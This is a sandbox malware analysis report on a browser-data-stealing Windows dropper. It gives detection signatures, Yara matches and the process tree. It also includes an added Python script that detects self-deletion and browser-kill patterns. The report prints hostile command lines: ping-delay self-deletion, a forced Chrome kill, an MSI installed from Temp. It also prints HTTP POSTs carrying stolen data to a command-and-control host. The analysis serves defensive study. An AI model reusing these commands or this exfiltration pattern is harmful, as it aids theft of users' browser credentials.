
Analysis Report fnhcdXEfus.exe

Overview

General Information

Sample Name: fnhcdXEfus.exe
Analysis ID: 346325
MD5: 18169f98e39ae228d131aec477c8a2e9
SHA1: c6c6eacaa8df6ea5251c7f26a2d9ec4317092e6a
SHA256: 344b323928698d9982c7577e5405a1cb587c45f94a0f6745827648381397f255
Tags: Mingloa

Most interesting Screenshot:

Detection

Score: 90
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (creates a PE file in dynamic memory)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to detect sleep reduction / modifications
Contains functionality to infect the boot sector
Hides threads from debuggers
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has a writeable .text section
Registers a new ROOT certificate
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Checks for available system drives (often done to infect USB drives)
Checks if the current process is being debugged
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read device registry values (via SetupAPI)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a Chrome extension
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains strange resources
Queries device information via Setup API
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

Startup

  • System is w10x64
  • fnhcdXEfus.exe (PID: 5976 cmdline: 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: 18169F98E39AE228D131AEC477C8A2E9)
    • msiexec.exe (PID: 4084 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 63C4F3D9EA0CC861.exe (PID: 3664 cmdline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2 MD5: 18169F98E39AE228D131AEC477C8A2E9)
      • 1612045890161.exe (PID: 5440 cmdline: 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt' MD5: EF6F72358CB02551CAEBE720FBC55F95)
      • ThunderFW.exe (PID: 3148 cmdline: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe' MD5: F0372FF8A6148498B19E04203DBB9E69)
      • cmd.exe (PID: 412 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 5752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6268 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • 63C4F3D9EA0CC861.exe (PID: 6004 cmdline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2 MD5: 18169F98E39AE228D131AEC477C8A2E9)
      • cmd.exe (PID: 1240 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 3924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • taskkill.exe (PID: 6164 cmdline: taskkill /f /im chrome.exe MD5: 15E2E0ACD891510C6268CB8899F2A1A1)
      • cmd.exe (PID: 6328 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • PING.EXE (PID: 6372 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
    • cmd.exe (PID: 5776 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • PING.EXE (PID: 5748 cmdline: ping 127.0.0.1 -n 3 MD5: 70C24A306F768936563ABDADB9CA9108)
  • msiexec.exe (PID: 3492 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
  • cleanup
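Two things in this tree are worth turning into detection logic. First, every stage removes its own image with `cmd /c ping 127.0.0.1 -n 3 & del <path>`: the ping to loopback is a delay so that the deleting shell outlives the parent (the "Uses ping.exe to sleep" signature), and the same string is what the Ping_Command_in_EXE Yara rule matches in the unpacked payload. Second, the second 63C4F3D9EA0CC861.exe instance runs `taskkill /f /im chrome.exe`, which releases Chrome's exclusive locks on its profile databases before the tree goes on to open the Chrome profile directory. The following Python is an added example, not part of the Joe Sandbox report: it parses a tree in the layout printed above, links each ping-and-del to the ancestor whose image it deletes, and flags the browser kill and the msiexec install from the user's Temp directory. The sample tree is a subset copied from the Startup section; the finding names are this example's own.

```python
"""Heuristics over a sandbox process tree in the 'Startup' layout above:
ping-delay self-deletion, browser kill, and an MSI installed from Temp.
Added example, not part of the report."""
import re

# Constructed sample: a subset of the report's process tree, same layout.
SAMPLE_TREE = r"""
  • fnhcdXEfus.exe (PID: 5976 cmdline: 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: 18169F98E39AE228D131AEC477C8A2E9)
    • msiexec.exe (PID: 4084 cmdline: msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi' MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
    • 63C4F3D9EA0CC861.exe (PID: 6004 cmdline: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2 MD5: 18169F98E39AE228D131AEC477C8A2E9)
      • cmd.exe (PID: 1240 cmdline: cmd.exe /c taskkill /f /im chrome.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • cmd.exe (PID: 6328 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • cmd.exe (PID: 5776 cmdline: cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
"""

# One tree line: indentation, bullet, image name, PID, command line, MD5.
_PROC = re.compile(
    r"^(?P<indent>\s*)• (?P<name>\S+) \(PID: (?P<pid>\d+) cmdline: (?P<cmd>.*) MD5: (?P<md5>[0-9A-Fa-f]{32})\)\s*$"
)
# "ping 127.0.0.1 -n N & del <path>": the ping is a sleep, the del is the payload.
_PING_DEL = re.compile(r"ping 127\.0\.0\.1 -n (?P<n>\d+)\s*&\s*del\s+'?(?P<path>[^']+)'?\s*$")
_TASKKILL_BROWSER = re.compile(r"taskkill\s+/f\s+/im\s+(chrome|msedge|firefox)\.exe", re.I)
_MSI_FROM_TEMP = re.compile(r"/i\s+'?[^']*\\Temp\\", re.I)


def parse_tree(text):
    """Parse the indented tree into dicts carrying a 'parent' pid (None for roots)."""
    procs, stack = [], []            # stack holds (indent, proc) of open ancestors
    for line in text.splitlines():
        m = _PROC.match(line)
        if not m:
            continue                 # 'System is ...', 'cleanup', blank lines
        indent = len(m.group("indent"))
        while stack and stack[-1][0] >= indent:
            stack.pop()              # a sibling or shallower line closes deeper nodes
        proc = {
            "pid": int(m.group("pid")), "name": m.group("name"),
            "cmd": m.group("cmd").strip(), "md5": m.group("md5").upper(),
            "parent": stack[-1][1]["pid"] if stack else None,
        }
        procs.append(proc)
        stack.append((indent, proc))
    return procs


def image_path(proc):
    """First token of the command line, with the report's single quotes removed."""
    cmd = proc["cmd"]
    if cmd.startswith("'"):
        return cmd[1:].split("'", 1)[0]
    return cmd.split(" ", 1)[0]


def ancestors(proc, by_pid):
    while proc["parent"] is not None:
        proc = by_pid[proc["parent"]]
        yield proc


def analyze(procs):
    """Return (finding, pid, related_pid) tuples; related_pid is the process whose
    image a ping-and-del removes, or None when no ancestor matches."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for p in procs:
        cmd = p["cmd"]
        m = _PING_DEL.search(cmd)
        if m:
            target = m.group("path").strip().lower()
            victim = next((a["pid"] for a in ancestors(p, by_pid)
                           if image_path(a).lower() == target), None)
            findings.append(("ping_delay_delete", p["pid"], victim))
        if _TASKKILL_BROWSER.search(cmd):
            findings.append(("browser_kill", p["pid"], None))
        if p["name"].lower() == "msiexec.exe" and _MSI_FROM_TEMP.search(cmd):
            findings.append(("msi_from_temp", p["pid"], None))
    return findings


if __name__ == "__main__":
    for finding in analyze(parse_tree(SAMPLE_TREE)):
        print(finding)
```

Linking the `del` target back to an ancestor's image is what separates self-deletion from ordinary temp-file cleanup; a `ping`-then-`del` whose target is not in the process chain is much less interesting. The same parser can be pointed at an EDR process-tree export once the regular expression is adjusted to that tool's line format.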

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.fnhcdXEfus.exe.2810000.5.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
3.2.63C4F3D9EA0CC861.exe.26f0000.2.raw.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.63C4F3D9EA0CC861.exe.26d0000.5.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
4.2.63C4F3D9EA0CC861.exe.10000000.7.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n
3.2.63C4F3D9EA0CC861.exe.10000000.7.unpack | Ping_Command_in_EXE | Detects a suspicious ping command execution in an executable | Florian Roth
  • 0x25484:$x1: cmd /c ping 127.0.0.1 -n

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Metadefender: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | ReversingLabs: Detection: 82%
Multi AV Scanner detection for submitted file
Source: fnhcdXEfus.exe | Virustotal: Detection: 73%
Source: fnhcdXEfus.exe | Metadefender: Detection: 29%
Source: fnhcdXEfus.exe | ReversingLabs: Detection: 82%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Joe Sandbox ML: detected
Machine Learning detection for sample
Source: fnhcdXEfus.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F720
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,3_2_1001F720

Compliance:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Unpacked PE file: 0.2.fnhcdXEfus.exe.2810000.5.unpack
Uses 32bit PE files
Source: fnhcdXEfus.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses new MSVCR Dlls
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Contains modern PE file flags such as dynamic base (ASLR) or NX
Source: fnhcdXEfus.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Binary contains paths to debug symbols
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1612045890161.exe, 0000000B.00000000.258604279.000000000040F000.00000002.00020000.sdmp, 1612045890161.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: cmd_insert_server.icex-conference/x-cooltalk.movievideo/x-sgi-movievideo/x-msvideo.mxuvideo/vnd.mpegurl.qtvideo/quicktimevideo/mpeg.xmltext/xml.etxtext/x-setext.wmlstext/vnd.wap.wmlscript.wmltext/vnd.wap.wml.tsvtext/tab-separated-values.sgmtext/sgml.rtftext/rtf.rtxtext/richtext.txttext/plain.html.csstext/css.mshmodel/mesh.igsmodel/iges.xwdimage/x-xwindowdump.xpmimage/x-xpixmap.xbmimage/x-xbitmap.rgbimage/x-rgb.ppmimage/x-portable-pixmap.bgmimage/x-portable-graymap.pbmimage/x-portable-bitmap.pnmimage/x-portable-anymap.rasimage/x-cmu-raster.wbmpimage/vnd.wap.wbmp.djvimage/vnd.djvu.tiffimage/tiff.pngimage/png.jpgimage/jpeg.iefimage/ief.gifimage/gif.bmpimage/bmp.xyzchemical/x-xyz.pdbchemical/x-pdb.wavaudio/x-wavaudio/x-realaudio.arpmaudio/x-pn-realaudio-pluginaudio/x-pn-realaudio.m3uaudio/x-mpegurl.aifaudio/x-aiffaudio/mpeg.midiaudio/midiapplication/application/zip.xhtmlapplication/xhtml+xml.srcapplication/x-wais-source.ustarapplication/x-ustar.msapplication/x-troff-ms.meapplication/x-troff-me.manapplication/x-troff-man.texiapplication/x-texinfo.texapplication/x-tex.tclapplication/x-tclapplication/x-tar.sv4crcapplication/x-sv4crc.sv4cpioapplication/x-sv4cpio.sitapplication/x-stuffit.swfapplication/x-shockwave-flash.sharapplication/x-shar.shapplication/x-sh.latexapplication/x-latex.jsapplication/x-javascript.hdfapplication/x-hdf.gtarapplication/x-gtar.splapplication/x-futuresplash.dviapplication/x-dvi.cshapplication/x-csh.cpioapplication/x-cpio.pgnapplication/x-chess-pgn.vcdapplication/x-cdlink.bcpioapplication/x-bcpio.wmlscapplication/vnd.wap.wmlscriptc.wmlcapplication/vnd.wap.wmlc.wbxmlapplication/vnd.wap.wbxml.pptapplication/vnd.ms-powerpoint.xlsapplication/vnd.ms-excel.mifapplication/vnd.mif.smiapplication/smil.pdfapplication/pdf.odaapplication/oda.docapplication/msword.cptapplication/mac-compactpro.hqxapplication/mac-binhex40.ezapplication/andrew-inset source: download_engine.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\setup.pdb source: fnhcdXEfus.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001E.00000002.347950817.00000000002BC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI6DDB.tmp.1.dr
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: e:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe | File opened: a:
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0042A5EF __EH_prolog3_GS,_memset,GetTempPathW,FindFirstFileW,CompareFileTime,DeleteFileW,FindNextFileW,0_2_0042A5EF
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001A170 FindFirstFileA,FindClose,0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1001A170 FindFirstFileA,FindClose,3_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Google\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\

Networking:

Uses ping.exe to check the status of other devices and networks
Source: unknown | Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 | Host: C8DD8AE6DC4DC644.xyz | Accept: */*
Source: global traffic | HTTP traffic detected: POST //fine/send HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 84 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 93 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 93 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 93 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/e HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 677 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/g HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 1405 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: c8dd8ae6dc4dc644.xyz
